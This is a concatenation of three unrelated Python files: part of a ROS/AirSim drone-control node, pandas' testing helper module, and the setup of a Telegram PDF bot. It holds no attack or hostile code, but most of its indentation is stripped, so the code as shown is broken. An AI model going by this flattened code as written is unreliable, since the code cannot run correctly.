rospy.Subscriber(para['CMD_VEL_TOPIC'], TwistStamped, self._set_vel)
def __call__(self):
        vx, vy, vz, vw = 0, 0, 0, 0
        # Default velocity command until the first CMD_VEL message arrives
        self.desire_vel = [0, 0, 0, 0]
self.land = False
self.fix_pose = True
self.land_done = False
self.fix_pose_done = False
self.take_off_done = False
self.bridge = CvBridge()
self.image_pub = rospy.Publisher('/airsim/image_raw', Image, queue_size=1)
rate = 5
r = rospy.Rate(rate)
#threading.Thread(target=self._camera_thread).start()
while not rospy.is_shutdown():
#print(self.land, self.land_done, self.fix_pose, self.fix_pose_done, self.take_off_done)
self.get_image_and_publish()
if self.land:
if not self.land_done:
self.client.reset()
self.land_done = True
print('Landing Done')
else:
pass
#print('Landing Has Done')
else:
if self.fix_pose:
if self.take_off_done:
if self.fix_pose_done:
pass
#print('Fix Pose Has Done')
else:
self.client.moveToPositionAsync(0, 0, -8, 5).join()
self.fix_pose_done = True
print('Fix Pose Done')
else:
self.client.enableApiControl(True)
self.client.armDisarm(True)
print('Wait For take off')
self.client.takeoffAsync().join()
self.take_off_done = True
print('Take off Done')
else:
self.fix_pose_done = False
vx, vy, vz, vw = self.desire_vel
#vx, vy, vz, vw = [0, 0, 0, 20]
print(vx, vy, vz, vw)
self.client.rotateByYawRateAsync(vw, 0.1)
self.client.moveByVelocityAsync(vx, vy, vz, 0.1)
r.sleep()
def get_image_and_publish(self):
image = self.client.simGetImage("0", airsim.ImageType.Scene)
image = cv2.imdecode(
airsim.string_to_uint8_array(image),
cv2.IMREAD_UNCHANGED)[:, :, :3]
self.image_pub.publish(self.bridge.cv2_to_imgmsg(image, 'bgr8'))
def _camera_thread(self):
rate = 10.
r = rospy.Rate(rate)
image_pub = rospy.Publisher('/airsim/image_raw', Image, queue_size=1)
while not rospy.is_shutdown():
            image = self.client.simGetImage("0", airsim.ImageType.Scene)
image = cv2.imdecode(
airsim.string_to_uint8_array(image),
cv2.IMREAD_UNCHANGED)[:, :, :3]
image_pub.publish(self.bridge.cv2_to_imgmsg(image, 'bgr8'))
r.sleep()
def _land(self, land_topic):
self.land = land_topic.data
self.land_done = False
if not land_topic.data:
self.take_off_done = False
def _fix_pose(self, fix_pose_topic):
self.fix_pose = fix_pose_topic.data
def _set_vel(self, twist_topic):
self.desire_vel = [
twist_topic.twist.linear.x,
twist_topic.twist.linear.y,
twist_topic.twist.linear.z,
twist_topic.twist.angular.z * 180 / math.pi]
ibvs2airsim = IBVS_To_AirSim()
ibvs2airsim()
|
__init__.py
|
from __future__ import annotations
import collections
from datetime import datetime
from decimal import Decimal
from functools import wraps
import operator
import os
import re
import string
from typing import (
TYPE_CHECKING,
Callable,
ContextManager,
Counter,
Iterable,
)
import warnings
import numpy as np
from pandas._config.localization import ( # noqa:F401
can_set_locale,
get_locales,
set_locale,
)
from pandas._typing import Dtype
from pandas.core.dtypes.common import (
is_float_dtype,
is_integer_dtype,
is_sequence,
is_unsigned_integer_dtype,
pandas_dtype,
)
import pandas as pd
from pandas import (
Categorical,
CategoricalIndex,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
MultiIndex,
RangeIndex,
Series,
bdate_range,
)
from pandas._testing._io import ( # noqa:F401
close,
network,
round_trip_localpath,
round_trip_pathlib,
round_trip_pickle,
with_connectivity_check,
write_to_compressed,
)
from pandas._testing._random import ( # noqa:F401
randbool,
rands,
rands_array,
randu_array,
)
from pandas._testing._warnings import assert_produces_warning # noqa:F401
from pandas._testing.asserters import ( # noqa:F401
assert_almost_equal,
assert_attr_equal,
assert_categorical_equal,
assert_class_equal,
assert_contains_all,
assert_copy,
assert_datetime_array_equal,
assert_dict_equal,
assert_equal,
assert_extension_array_equal,
assert_frame_equal,
assert_index_equal,
assert_indexing_slices_equivalent,
assert_interval_array_equal,
assert_is_sorted,
assert_is_valid_plot_return_object,
assert_metadata_equivalent,
assert_numpy_array_equal,
assert_period_array_equal,
assert_series_equal,
assert_sp_array_equal,
assert_timedelta_array_equal,
raise_assert_detail,
)
from pandas._testing.compat import ( # noqa:F401
get_dtype,
get_obj,
)
from pandas._testing.contexts import ( # noqa:F401
RNGContext,
decompress_file,
ensure_clean,
ensure_clean_dir,
ensure_safe_environment_variables,
set_timezone,
use_numexpr,
with_csv_dialect,
)
from pandas.core.api import (
Float64Index,
Int64Index,
NumericIndex,
UInt64Index,
)
from pandas.core.arrays import (
BaseMaskedArray,
ExtensionArray,
PandasArray,
)
from pandas.core.arrays._mixins import NDArrayBackedExtensionArray
from pandas.core.construction import extract_array
if TYPE_CHECKING:
from pandas import (
PeriodIndex,
TimedeltaIndex,
)
_N = 30
_K = 4
UNSIGNED_INT_NUMPY_DTYPES: list[Dtype] = ["uint8", "uint16", "uint32", "uint64"]
UNSIGNED_INT_EA_DTYPES: list[Dtype] = ["UInt8", "UInt16", "UInt32", "UInt64"]
SIGNED_INT_NUMPY_DTYPES: list[Dtype] = [int, "int8", "int16", "int32", "int64"]
SIGNED_INT_EA_DTYPES: list[Dtype] = ["Int8", "Int16", "Int32", "Int64"]
ALL_INT_NUMPY_DTYPES = UNSIGNED_INT_NUMPY_DTYPES + SIGNED_INT_NUMPY_DTYPES
ALL_INT_EA_DTYPES = UNSIGNED_INT_EA_DTYPES + SIGNED_INT_EA_DTYPES
FLOAT_NUMPY_DTYPES: list[Dtype] = [float, "float32", "float64"]
FLOAT_EA_DTYPES: list[Dtype] = ["Float32", "Float64"]
COMPLEX_DTYPES: list[Dtype] = [complex, "complex64", "complex128"]
STRING_DTYPES: list[Dtype] = [str, "str", "U"]
DATETIME64_DTYPES: list[Dtype] = ["datetime64[ns]", "M8[ns]"]
TIMEDELTA64_DTYPES: list[Dtype] = ["timedelta64[ns]", "m8[ns]"]
BOOL_DTYPES: list[Dtype] = [bool, "bool"]
BYTES_DTYPES: list[Dtype] = [bytes, "bytes"]
OBJECT_DTYPES: list[Dtype] = [object, "object"]
ALL_REAL_NUMPY_DTYPES = FLOAT_NUMPY_DTYPES + ALL_INT_NUMPY_DTYPES
ALL_NUMPY_DTYPES = (
ALL_REAL_NUMPY_DTYPES
+ COMPLEX_DTYPES
+ STRING_DTYPES
+ DATETIME64_DTYPES
+ TIMEDELTA64_DTYPES
+ BOOL_DTYPES
+ OBJECT_DTYPES
+ BYTES_DTYPES
)
NARROW_NP_DTYPES = [
np.float16,
np.float32,
np.int8,
np.int16,
np.int32,
np.uint8,
np.uint16,
np.uint32,
]
NULL_OBJECTS = [None, np.nan, pd.NaT, float("nan"), pd.NA, Decimal("NaN")]
NP_NAT_OBJECTS = [
cls("NaT", unit)
for cls in [np.datetime64, np.timedelta64]
for unit in [
"Y",
"M",
"W",
"D",
"h",
"m",
"s",
"ms",
"us",
"ns",
"ps",
"fs",
"as",
]
]
EMPTY_STRING_PATTERN = re.compile("^$")
# set testing_mode
_testing_mode_warnings = (DeprecationWarning, ResourceWarning)
def set_testing_mode():
# set the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("always", category)
def reset_testing_mode():
# reset the testing mode filters
testing_mode = os.environ.get("PANDAS_TESTING_MODE", "None")
if "deprecate" in testing_mode:
for category in _testing_mode_warnings:
warnings.simplefilter("ignore", category)
set_testing_mode()
def reset_display_options():
"""
Reset the display options for printing and representing objects.
"""
pd.reset_option("^display.", silent=True)
# -----------------------------------------------------------------------------
# Comparators
def equalContents(arr1, arr2) -> bool:
"""
Checks if the set of unique elements of arr1 and arr2 are equivalent.
"""
return frozenset(arr1) == frozenset(arr2)
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.array:
if isinstance(expected, RangeIndex):
# pd.array would return an IntegerArray
expected = PandasArray(np.asarray(expected._values))
else:
expected = pd.array(expected)
elif box_cls is Index:
expected = Index._with_infer(expected)
elif box_cls is Series:
expected = Series(expected)
elif box_cls is DataFrame:
expected = Series(expected).to_frame()
if transpose:
# for vector operations, we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length. But convert to two rows to avoid
# single-row special cases in datetime arithmetic
expected = expected.T
expected = pd.concat([expected] * 2, ignore_index=True)
elif box_cls is np.ndarray or box_cls is np.array:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
"""
Similar to pd.array, but does not cast numpy dtypes to nullable dtypes.
"""
# temporary implementation until we get pd.array in place
dtype = getattr(obj, "dtype", None)
if dtype is None:
return np.asarray(obj)
return extract_array(obj, extract_numpy=True)
# -----------------------------------------------------------------------------
# Others
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
"""make a length k index or n categories"""
x = rands_array(nchars=4, size=n, replace=False)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
"""make a length k IntervalIndex"""
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeNumericIndex(k=10, name=None, *, dtype):
dtype = pandas_dtype(dtype)
assert isinstance(dtype, np.dtype)
if is_integer_dtype(dtype):
values = np.arange(k, dtype=dtype)
if is_unsigned_integer_dtype(dtype):
values += 2 ** (dtype.itemsize * 8 - 1)
elif is_float_dtype(dtype):
values = np.random.random_sample(k) - np.random.random_sample(1)
values.sort()
values = values * (10 ** np.random.randint(0, 9))
else:
raise NotImplementedError(f"wrong dtype {dtype}")
return NumericIndex(values, dtype=dtype, name=name)
def makeIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="int64")
return Int64Index(base_idx)
def makeUIntIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="uint64")
return UInt64Index(base_idx)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
base_idx = makeNumericIndex(k, name=name, dtype="float64")
return Float64Index(base_idx)
def makeDateIndex(k: int = 10, freq="B", name=None, **kwargs) -> DatetimeIndex:
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k: int = 10, freq="D", name=None, **kwargs) -> TimedeltaIndex:
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k: int = 10, name=None, **kwargs) -> PeriodIndex:
dt = datetime(2000, 1, 1)
return pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
N = (k // 2) + 1
rng = range(N)
mi = MultiIndex.from_product([("foo", "bar"), rng], names=names, **kwargs)
assert len(mi) >= k # GH#38795
return mi[:k]
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
yield from make_index_funcs
def all_timeseries_index_generator(k: int = 10) -> Iterable[Index]:
"""
Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs: list[Callable[..., Index]] = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def make_rand_series(name=None, dtype=np.float64):
index = makeStringIndex(_N)
data = np.random.randn(_N)
data = data.astype(dtype, copy=False)
return Series(data, index=index, name=name)
def makeFloatSeries(name=None):
return make_rand_series(name=name)
def makeStringSeries(name=None):
return make_rand_series(name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(_N)
data = Index(data, dtype=object)
index = makeStringIndex(_N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(_N)
return {c: Series(np.random.randn(_N), index=index) for c in getCols(_K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = _N
return Series(
np.random.randn(nper), index=makeDateIndex(nper, freq=freq), name=name
)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = _N
return Series(np.random.randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(_K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(_K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame() -> DataFrame:
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""
    Create an index/multiindex with given dimensions, levels, names, etc.
    nentries - number of entries in index
    nlevels - number of levels (> 1 produces multiindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
    label will be repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func_dict: dict[str, Callable[..., Index]] = {
"i": makeIntIndex,
"f": makeFloatIndex,
"s": makeStringIndex,
"u": makeUnicodeIndex,
"dt": makeDateIndex,
"td": makeTimedeltaIndex,
"p": makePeriodIndex,
}
idx_func = idx_func_dict.get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
list_of_lists = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
        # typing.Counter is deprecated since Python 3.9, when
        # collections.Counter gained subscripting support (PEP 585).
cnt: Counter[str] = collections.Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
list_of_lists.append(result)
tuples = list(zip(*list_of_lists))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
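# A small sketch of the label layout makeCustomIndex produces (for
# illustration only; the values are traced from the logic above, not claimed
# as official pandas output):
#
#     makeCustomIndex(4, nlevels=2, ndupe_l=[2])
#     # MultiIndex whose first level repeats each label twice:
#     # [("#_l0_g0", "#_l1_g0"), ("#_l0_g0", "#_l1_g1"),
#     #  ("#_l0_g1", "#_l1_g2"), ("#_l0_g1", "#_l1_g3")]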
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
    c_idx_names, r_idx_names - False/True/list of strings, yields no names,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
    data_gen_f - a function f(row,col) which returns the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
    # 4-level multiindex on rows with names provided, 2-level multiindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FIH","FOH","FUM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
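# A minimal usage sketch of ``test_parallel`` (hypothetical function names,
# for illustration only): the decorated function body runs once per thread,
# and the call blocks until every thread has joined.
#
#     results = []
#
#     @test_parallel(num_threads=3)
#     def append_one():
#         results.append(1)
#
#     append_one()
#     assert len(results) == 3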
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
# For testing, those properties return a generic callable, and not
# the actual class. In this case that is equivalent, but it is to
# ensure we don't rely on the property returning a class
# See https://github.com/pandas-dev/pandas/pull/46018 and
# https://github.com/pandas-dev/pandas/issues/32638 and linked issues
return lambda *args, **kwargs: SubclassedSeries(*args, **kwargs)
@property
def _constructor_expanddim(self):
return lambda *args, **kwargs: SubclassedDataFrame(*args, **kwargs)
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return lambda *args, **kwargs: SubclassedDataFrame(*args, **kwargs)
@property
def _constructor_sliced(self):
return lambda *args, **kwargs: SubclassedSeries(*args, **kwargs)
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: list[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None) # noqa: PDF010
cython_table = pd.core.common._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from com._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : str
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
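# A quick sketch of get_op_from_name (for illustration only): plain names map
# straight to ``operator`` functions, while reverse names swap the operands.
#
#     get_op_from_name("add")(2, 3)       # 5, via operator.add
#     get_op_from_name("rsub")(2, 3)      # 1, computed as operator.sub(3, 2)
#     get_op_from_name("__radd__")(2, 3)  # 5, computed as operator.add(3, 2)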
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
# -----------------------------------------------------------------------------
def shares_memory(left, right) -> bool:
"""
Pandas-compat for np.shares_memory.
"""
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
return np.shares_memory(left, right)
elif isinstance(left, np.ndarray):
# Call with reversed args to get to unpacking logic below.
return shares_memory(right, left)
if isinstance(left, RangeIndex):
return False
if isinstance(left, MultiIndex):
return shares_memory(left._codes, right)
if isinstance(left, (Index, Series)):
return shares_memory(left._values, right)
if isinstance(left, NDArrayBackedExtensionArray):
return shares_memory(left._ndarray, right)
if isinstance(left, pd.core.arrays.SparseArray):
return shares_memory(left.sp_values, right)
if isinstance(left, pd.core.arrays.IntervalArray):
return shares_memory(left._left, right) or shares_memory(left._right, right)
if isinstance(left, ExtensionArray) and left.dtype == "string[pyarrow]":
# https://github.com/pandas-dev/pandas/pull/43930#discussion_r736862669
if isinstance(right, ExtensionArray) and right.dtype == "string[pyarrow]":
# error: "ExtensionArray" has no attribute "_data"
left_pa_data = left._data # type: ignore[attr-defined]
# error: "ExtensionArray" has no attribute "_data"
right_pa_data = right._data # type: ignore[attr-defined]
left_buf1 = left_pa_data.chunk(0).buffers()[1]
right_buf1 = right_pa_data.chunk(0).buffers()[1]
return left_buf1 == right_buf1
if isinstance(left, BaseMaskedArray) and isinstance(right, BaseMaskedArray):
# By convention, we'll say these share memory if they share *either*
# the _data or the _mask
return np.shares_memory(left._data, right._data) or np.shares_memory(
left._mask, right._mask
)
if isinstance(left, DataFrame) and len(left._mgr.arrays) == 1:
arr = left._mgr.arrays[0]
return shares_memory(arr, right)
raise NotImplementedError(type(left), type(right))
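# A minimal sketch of shares_memory (for illustration only): objects backed by
# the same buffer report True, fresh copies report False.
#
#     ser = Series(np.arange(5))
#     assert shares_memory(ser, ser.values)      # view of the same buffer
#     assert not shares_memory(ser, ser.copy())  # deep copy, new buffer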
|
bot.py
|
import datetime as dt
import logging
import os
import sys
from threading import Thread
from dotenv import load_dotenv
from logbook import Logger, StreamHandler
from logbook.compat import redirect_logging
from telegram import (
ForceReply,
InlineKeyboardButton,
InlineKeyboardMarkup,
MessageEntity,
ParseMode,
Update,
)
from telegram.chataction import ChatAction
from telegram.ext import (
CallbackContext,
CallbackQueryHandler,
CommandHandler,
Filters,
MessageHandler,
PreCheckoutQueryHandler,
Updater,
)
from telegram.error import Unauthorized
from telegram.ext import messagequeue as mq
from telegram.utils.request import Request
from pdf_bot import *
load_dotenv()
APP_URL = os.environ.get("APP_URL")
PORT = int(os.environ.get("PORT", "8443"))
TELE_TOKEN = os.environ.get("TELE_TOKEN_BETA", os.environ.get("TELE_TOKEN"))
DEV_TELE_ID = int(os.environ.get("DEV_TELE_ID"))
TIMEOUT = 20
CALLBACK_DATA = "callback_data"
def main():
# Setup logging
logging.getLogger("pdfminer").setLevel(logging.WARNING)
logging.getLogger("ocrmypdf").setLevel(logging.WARNING)
redirect_logging()
format_string = "{record.level_name}: {record.message}"
StreamHandler(
sys.stdout, format_string=format_string, level="INFO"
).push_application()
log = Logger()
q = mq.MessageQueue(all_burst_limit=3, all_time_limit_ms=3000)
request = Request(con_pool_size=8)
pdf_bot = MQBot(TELE_TOKEN, request=request, mqueue=q)
# Create the EventHandler and pass it your bot's token.
updater = Updater(
bot=pdf_bot,
use_context=True,
request_kwargs={"connect_timeout": TIMEOUT, "read_timeout": TIMEOUT},
)
def stop_and_restart():
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(_):
Thread(target=stop_and_restart).start()
job_queue = updater.job_queue
job_queue.run_repeating(restart, interval=dt.timedelta(minutes=30))
# Get the dispatcher to register handlers
dispatcher = updater.dispatcher
# General commands handlers
dispatcher.add_handler(CommandHandler("start", start_msg, run_async=True))
dispatcher.add_handler(CommandHandler("help", help_msg, run_async=True))
dispatcher.add_handler(CommandHandler("setlang", send_lang, run_async=True))
dispatcher.add_handler(
CommandHandler("support", send_support_options, run_async=True)
)
dispatcher.add_handler(CommandHandler("send", send_msg, Filters.user(DEV_TELE_ID)))
dispatcher.add_handler(
CommandHandler("stats", get_stats, Filters.user(DEV_TELE_ID))
)
# Callback query handler
dispatcher.add_handler(CallbackQueryHandler(process_callback_query, run_async=True))
# Payment handlers
dispatcher.add_handler(PreCheckoutQueryHandler(precheckout_check, run_async=True))
dispatcher.add_handler(
MessageHandler(Filters.successful_payment, successful_payment, run_async=True)
)
# URL handler
dispatcher.add_handler(
MessageHandler(Filters.entity(MessageEntity.URL), url_to_pdf, run_async=True)
)
# PDF commands handlers
dispatcher.add_handler(compare_cov_handler())
dispatcher.add_handler(merge_cov_handler())
dispatcher.add_handler(photo_cov_handler())
dispatcher.add_handler(text_cov_handler())
